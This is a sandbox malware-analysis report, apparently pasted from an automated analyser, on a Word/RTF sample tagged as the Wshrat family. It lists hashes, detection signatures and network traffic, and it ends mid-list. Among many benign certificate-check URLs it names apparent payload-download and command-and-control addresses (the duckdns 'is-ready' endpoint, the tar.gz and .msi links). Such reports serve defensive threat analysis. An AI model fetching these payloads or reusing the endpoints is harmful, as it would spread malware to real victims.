
Docs_0251b22f858fcc0ced62b34fdbda70c9_doc.json

paladin316 Jun 18th, 2019 78 Never
  1.  
  2. [*] MalFamily: "Wshrat"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Docs_0251b22f858fcc0ced62b34fdbda70c9.doc"
  7. [*] File Size: 267436
  8. [*] File Type: "Rich Text Format data, version 1, unknown character set"
  9. [*] SHA256: "bbefd3aa4e17e4e4d8dc212af713f28c101072a37d17894cdc53d589f500c513"
  10. [*] MD5: "0251b22f858fcc0ced62b34fdbda70c9"
  11. [*] SHA1: "1cf6d9af3a06dd37b8e316acc792b284864f49e8"
  12. [*] SHA512: "c56db255e3302d131b943885a5a41b50c21055280c043119922deac1f4defec53885694117c9bcb28e9cb82dcea25d1df4a431b60ff66d560b53381adc2824eb"
  13. [*] CRC32: "C56D2101"
  14. [*] SSDEEP: "768:s7Kf2sdrM3xaSybdRZXZWkWZNLekKXw47vm6KE1ml2OsyoFt/xsY58aMmYhd0PhB:sxxQW3ykpeu6K5sv/T59nyXUq5aWmEO"
  15.  
  16. [*] Process Execution: [
  17.     "WINWORD.EXE"
  18. ]
  19.  
  20. [*] Signatures Detected: [
  21.     {
  22.         "Description": "Attempts to connect to a dead IP:Port (6 unique times)",
  23.         "Details": [
  24.             {
  25.                 "IP": "104.87.15.67:443"
  26.             },
  27.             {
  28.                 "IP": "104.18.24.243:80"
  29.             },
  30.             {
  31.                 "IP": "104.100.17.152:443"
  32.             },
  33.             {
  34.                 "IP": "52.109.92.24:443"
  35.             },
  36.             {
  37.                 "IP": "72.21.91.29:80"
  38.             },
  39.             {
  40.                 "IP": "52.109.12.6:443"
  41.             }
  42.         ]
  43.     },
  44.     {
  45.         "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  46.         "Details": [
  47.             {
  48.                 "ioc": "turabian.xsl"
  49.             },
  50.             {
  51.                 "ioc": "ontent.inf"
  52.             },
  53.             {
  54.                 "ioc": "iso690.xsl"
  55.             },
  56.             {
  57.                 "ioc": "mlaseventheditionofficeonline.xsl"
  58.             },
  59.             {
  60.                 "ioc": "ist.glox"
  61.             },
  62.             {
  63.                 "ioc": "adial.glox"
  64.             },
  65.             {
  66.                 "ioc": "chicago.xsl"
  67.             },
  68.             {
  69.                 "ioc": "architecture.glox"
  70.             },
  71.             {
  72.                 "ioc": "quations.dotx"
  73.             },
  74.             {
  75.                 "ioc": "iso690nmerical.xsl"
  76.             },
  77.             {
  78.                 "ioc": "gb.xsl"
  79.             },
  80.             {
  81.                 "ioc": "content.inf"
  82.             },
  83.             {
  84.                 "ioc": "rame.thmx"
  85.             },
  86.             {
  87.                 "ioc": "gosttitle.xsl"
  88.             },
  89.             {
  90.                 "ioc": "set.dotx"
  91.             },
  92.             {
  93.                 "ioc": "rocess.glox"
  94.             },
  95.             {
  96.                 "ioc": "chevronaccent.glox"
  97.             },
  98.             {
  99.                 "ioc": "sist02.xsl"
  100.             },
  101.             {
  102.                 "ioc": "pictureorgchart.glox"
  103.             },
  104.             {
  105.                 "ioc": "iew.thmx"
  106.             }
  107.         ]
  108.     },
  109.     {
  110.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  111.         "Details": [
  112.             {
  113.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  114.             },
  115.             {
  116.                 "suspicious_request": "http://vemvemserver.duckdns.org:1425/is-ready"
  117.             },
  118.             {
  119.                 "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  120.             },
  121.             {
  122.                 "suspicious_request": "http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D"
  123.             },
  124.             {
  125.                 "suspicious_request": "http://doughnut-snack.live/bpvpl.tar.gz"
  126.             },
  127.             {
  128.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  129.             },
  130.             {
  131.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  132.             },
  133.             {
  134.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  135.             },
  136.             {
  137.                 "suspicious_request": "http://doughnut-snack.live/mapv.tar.gz"
  138.             },
  139.             {
  140.                 "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  141.             },
  142.             {
  143.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  144.             },
  145.             {
  146.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  147.             },
  148.             {
  149.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  150.             },
  151.             {
  152.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  153.             },
  154.             {
  155.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  156.             },
  157.             {
  158.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  159.             },
  160.             {
  161.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  162.             },
  163.             {
  164.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  165.             },
  166.             {
  167.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  168.             },
  169.             {
  170.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  171.             },
  172.             {
  173.                 "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  174.             },
  175.             {
  176.                 "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  177.             },
  178.             {
  179.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  180.             },
  181.             {
  182.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  183.             },
  184.             {
  185.                 "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  186.             },
  187.             {
  188.                 "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  189.             },
  190.             {
  191.                 "suspicious_request": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes"
  192.             }
  193.         ]
  194.     },
  195.     {
  196.         "Description": "Performs some HTTP requests",
  197.         "Details": [
  198.             {
  199.                 "url": "http://paroquiadamarinhagrande.pt/app/hmvrch.msi"
  200.             },
  201.             {
  202.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
  203.             },
  204.             {
  205.                 "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
  206.             },
  207.             {
  208.                 "url": "http://vemvemserver.duckdns.org:1425/is-ready"
  209.             },
  210.             {
  211.                 "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  212.             },
  213.             {
  214.                 "url": "http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D"
  215.             },
  216.             {
  217.                 "url": "http://doughnut-snack.live/bpvpl.tar.gz"
  218.             },
  219.             {
  220.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  221.             },
  222.             {
  223.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  224.             },
  225.             {
  226.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  227.             },
  228.             {
  229.                 "url": "http://doughnut-snack.live/mapv.tar.gz"
  230.             },
  231.             {
  232.                 "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  233.             },
  234.             {
  235.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  236.             },
  237.             {
  238.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  239.             },
  240.             {
  241.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  242.             },
  243.             {
  244.                 "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  245.             },
  246.             {
  247.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  248.             },
  249.             {
  250.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  251.             },
  252.             {
  253.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  254.             },
  255.             {
  256.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  257.             },
  258.             {
  259.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  260.             },
  261.             {
  262.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  263.             },
  264.             {
  265.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  266.             },
  267.             {
  268.                 "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  269.             },
  270.             {
  271.                 "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  272.             },
  273.             {
  274.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  275.             },
  276.             {
  277.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  278.             },
  279.             {
  280.                 "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  281.             },
  282.             {
  283.                 "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  284.             },
  285.             {
  286.                 "url": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes"
  287.             }
  288.         ]
  289.     },
  290.     {
  291.         "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
  292.         "Details": [
  293.             {
  294.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbf\\xbf\\x833\\xa7\\xcco8r/\\x19\\xeb\\xb5n\\xcc\\x13u\\xbc\\xc0\\xb1\\x8b\\xc1\\xb8\\x06\\x80\\x9d\\x0ev\\xd1yab~\\xfe5\\xf2\\x04`\\xf2a\\x90\\x02\\x84z\\xb6\\xb3\\x07\\xf6up\\x86\\xd8l\\xa5z\\xff?\\x0b\\xa2\\xb7\\x1da{z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x90\\x16x\\xd4\\x0cm\\xbc\\xe2\\xf5g\\x996\\xc9\\xcc\\xa9>ll\\x89j\\xf6\\xacr}\\xf7\\xa6\\x81\\x88\\xe8\\x81\\xa5-t\\xec\\xf7o\\xbf\\x82\\xe1$\\xe8\\x1c:z\\xa5\\\\xd5\\x89"
  295.             },
  296.             {
  297.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p]\\xd4\\xf7j\\x19h\\x01e\\xff\\xa1\\xa8\\x85dx!\\xc3\\xfcy<au\\x9b\\xc8\\xc4\\xe6\\x16\\x16\\xa2\\xa0\\xa5\\xf6p\\xba4.0\\xaa\t\t~\\xd5\\xd4[\\x91\\xd6\\xc4n6\\xf7\\x98\\x86\\xc5r\\x8a\\xa6\\x81\\xe3h\\x9e\\xa2x#-\\xd8h,\\xca\\xe0\\xe5bl]\\x07\\x8f\\xde\\xd6\\xacg\\x8a;>\\xe6\\xe0\\x86*>dhz\\xa0o\\xca\\xc6u\\xc4?\\x13\\xa3\\x9ad\\xca\\xc0g\tj\\xdc\\xd9\\x9bn\\x15\\xa5l\\xc4\\x0e!\\xb3d\\xd0m\\xf1\\x91qhf\\xddb\\x9e\\x85\\xf9\\x83\\x16\\xbf\\x91w&\\x9bi\\xca\\xa5\\xc8/\\x05\\xa0\\x9cl\\xe3\\xa54\\xce\\xa8dt/\\xa11o\\xe5\\x99\\xbe\\xe3\\xdb\\xec\\x99 st5x\n_m\\x9f[\\x08[\\xb4h\\x9c\\xd8<\\xbe\\xbdy\\xed\t\\xb3m\\x0f^_\\x9be\\xe0#\\x0fi\\xbac\\xd4}\\x12\\x19\\x83\\xb9\\x93\\xc1\\x86\\xef\\xf0(?b9y3\\x9b4\\xa2w\\x9f\\xc9\\x96\\xd2\\xbd\\x9b\\x0c!\\xa4\\xcd\\xd8\\x96\\xd2\\x98@\\x8e\\xec\\xee\\xa1\\x1d\\xef\\x85\\x17\\x99n3m\\x15\\xec\\xf3mu"
  298.             },
  299.             {
  300.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01]\t}\n\\xc9\\xce\\x10\\xc8%\\x94\\xe6\\xe9\\x8d\\xfe_\\x840`)\\x1a\\xbadz\\xfa*\\xd4i8\\x9fu\\xa4,\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  301.             },
  302.             {
  303.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04hu\\xbc\\xb5j\\xd5bm>\\xedj\\x96\\xe1\\xc43\\xf9\\xd8\\xfa'\\xe4fv\\xfa\\x88#\\x9b\\xa8\\x83\\x80r\\xe8i+\\xb9\\x03\\xd1\\xccom\\x04\\xf4oq\\xc7\\x00\\xec\\xec\\x9b\\xabx7m\\xf6@4\\xcc\\x12ich\\\\x8dzs\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd8'l\\x94\\xd6\\xf2x\\xcf(\\xe8+\\xfc\\xd1`\\x80b\\xba{\\x8c\\xa9@\\xa1g\\xa4\\xf6\\xdd\\xff\\x9d\\xfb\\xc5z\\xa4i\\x80e\\x88\\xbd\\xb7y\\xa3)/\\x88b4\\xf7u\\xff"
  304.             },
  305.             {
  306.                 "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\ncache-control: max-age = 89056\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: fri, 22 mar 2019 18:30:24 gmt\r\nif-"
  307.             },
  308.             {
  309.                 "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
  310.             },
  311.             {
  312.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01]\t}\r\\xca]\\x14,\\xfb\\xa2\\x1ew2\\x96\\xd12b\\x85\\x1c\\xec\\x08\\xbd\\xaf\\x04vq\\xa0\\xb5\\xa7m\\xe9\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  313.             },
  314.             {
  315.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x86\\xbf|\\xf6\\xef\\xd0b\\x9fy-\\xaad\\x8f\\xdc\\xb0\\xee\\x01\\xb4c\\xfb\\xf3+oq\\xc4\\xd5\\x90\\?3\\x18\\x1f@\\x80\\xac~e=\\xd2\\x1e\\xb6g\\xfd]%\\xd6\\x9cx\\xcf.\\xb0w\\x81 nkp{\\xf0\\x0b*\\xbe4y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x81jo~\\xaf\\xbe\\x05\\xcd\\x13t\\xcc\\xf2b&\\x83&sy\\x0c~\\xb6\\xa3\\x0b\\x1f\n9g\\x12]j\\x15\\x0e\\xa7*c\\xb9\\xb7\\x13\\x1eqth\"\\x87y\\xb3\\x97)"
  316.             },
  317.             {
  318.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p&o\\xcewbn]0\\x83\\xdc\\xa0/9e\\xfc\\xf4\\x94\\xe2*\\xb1\\x9d$]\rc\\xfb@\\x8d\\xc8\t\\x88\\xb9\\x9d\\xa9\\xa6\\x1c'\\xe6y\\xfc\\xb9\\xe2\\xa4\\xdd\\x1dfk\\xcby\\x83\n\\x1d\\xeb\\xc0\\xdcnt\\xc0,\\xf9q\\x16*\\x8b8\\x02\\x8a\\xd97\\x89\\x1e9_\\xeb\\xc02t\\xec\\xba\\xce\\xc6\\xf7#\\xe6\\xba\\xb6\\x0b\\xfb\\xf3\\x8c\\x87\\xd6y\\xdd!\\xe3\\x11g\\x82\\x1d\\xa4\\x0f\tt\\xce-.>r\\x8a\\xaeg\\xad\\xb5\\x94\\xa4.\\xf9\\xbb\\xc5\\xbf)\\x88\\x99fuu$h\\xc0hec*\\xab\\xe9\\xb4:2\\xa8\\xd9}-\\x1e\\x909\\x9b\\xb9\\x83\\x0e{d\\x1e\\x8c\\x13\\x01^\\x0f\\xa1\\xd1-\\x10\\x1f/\\xbav\\xe6n rr]\\x87\\xd0i\\x95\\x11\\xa7{s:cv\\x9a\\x059*/\\xd9x`\\xc0\\x84l\\x9e\\x8f\\xbaj\\xf0\\xbax\\xb4tg\\xda4\\xf6\\x1c\\xbb \\xe7\\xfc\\xa8y\\xf1\\x07\\x03dj=y\\xbe\n)e(e2\\xc6:3ld?\\xeb\\xd8lyt\\xed\\xa2\\xbd\\xd7\\x16\\xee\\x01'\\x925\\xc2\\xd9"
  319.             },
  320.             {
  321.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01pg\\xd7\\xcb\\x05\\x95u\\x07\\x12\\xb8\\xf7\\x15\\xa5\\x97\\xc1n8\\xd8\\x1e\\xea\\xb9g\\x86/\\xfa\\xe4\\xbc\\xc8zu}a\\x99\\xa0\\xea\\xa6b,mh\\x98\\x1be\\xa9&[x\\xf9\\x8fz\\xc3\\xb3\\xe6\\xa4\\xaa%o\\xf7\\xa8(u\\xc2\\xf5v\\xa9$/\\xae\\xb9\\xb6\\x1e\\x03`\\x84\\x9co\\x9b\\xbbe,\\x88\\xfa\nv\\xbef\\x9a\\x05>\\xf3ta\\xa0[\\xa4okya(\\xd4\\x9d\\x90\\xe9\\xb9*\\xfdk.\\xb9\\xb4kq\\xb8\\xd4\\x96\\xc4\\x89\\xdc\\xc9{\\xa1m6\\x1f\\xba:\\xe3\\x96g\\x89\\x93u\\xc7!\\xe5\ru\\x17\r\\xc4\\xbf\\x18<\"\\xc5\\x92_\\xc0\\xc1\\xae\\x82&-\\x04\\x80\\xcb\\x8adp:\\xdf\\xf80\\xd0g\\x0f\\xccsr\\x98\\xd6\\xea\\x08h\\xf7'2\\xc7\\xc5\\xad\\x9ejf\\x82\\x11\\xf7)\\x8d\\xb1\\xad\\x01~ur\\xbba\\x9f\n\\xd5\\xa8\\xb8o\\x94d\\xba\\xc6hs$\\x88\\x18\\x8b\\xc6\\xfde\\xeb_\\xdc\\xba]lif8\\xb2\\xd2v\\x85\\xe0\\xf1\\xe9\\x123\\xa9{\\x81\\x14\\x0e\\xdd\\xe4\\x1a\\xcedl\\xdd\\x0e]63\\xe5|"
  322.             },
  323.             {
